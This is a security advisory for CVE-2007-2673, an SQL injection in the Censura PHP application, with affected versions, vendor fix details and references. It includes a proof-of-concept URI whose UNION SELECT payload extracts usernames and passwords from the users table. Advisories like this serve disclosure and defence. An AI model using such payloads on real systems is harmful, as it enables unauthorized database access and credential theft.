BID:23796

Censura Censura.PHP SQL Injection Vulnerability

Info

Censura Censura.PHP SQL Injection Vulnerability

Bugtraq ID:	23796
Class:	Input Validation Error
CVE:	CVE-2007-2673
Remote:	Yes
Local:	No
Published:	May 03 2007 12:00AM
Updated:	May 07 2015 05:39PM
Credit:	Cyber-Security is credited with the discovery of this vulnerability.
Vulnerable:	Censura Censura 1.16.1 Censura Censura 1.16 Censura Censura 1.15.2

Not Vulnerable:	Censura Censura 1.16.2

Discussion

Censura Censura.PHP SQL Injection Vulnerability

Censura is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Censura 1.15.04 is reported vulnerable; other versions may also be affected.

Exploit / POC

Censura Censura.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/

Solution / Fix

Censura Censura.PHP SQL Injection Vulnerability

Solution:
The vendor has released version 1.16.02, which addresses this issue. Please contact the vendor for information on how to obtain and apply the update.

References

Censura Censura.PHP SQL Injection Vulnerability

References:

Censure Change Log (Censura)
Censura Homepage (Censura)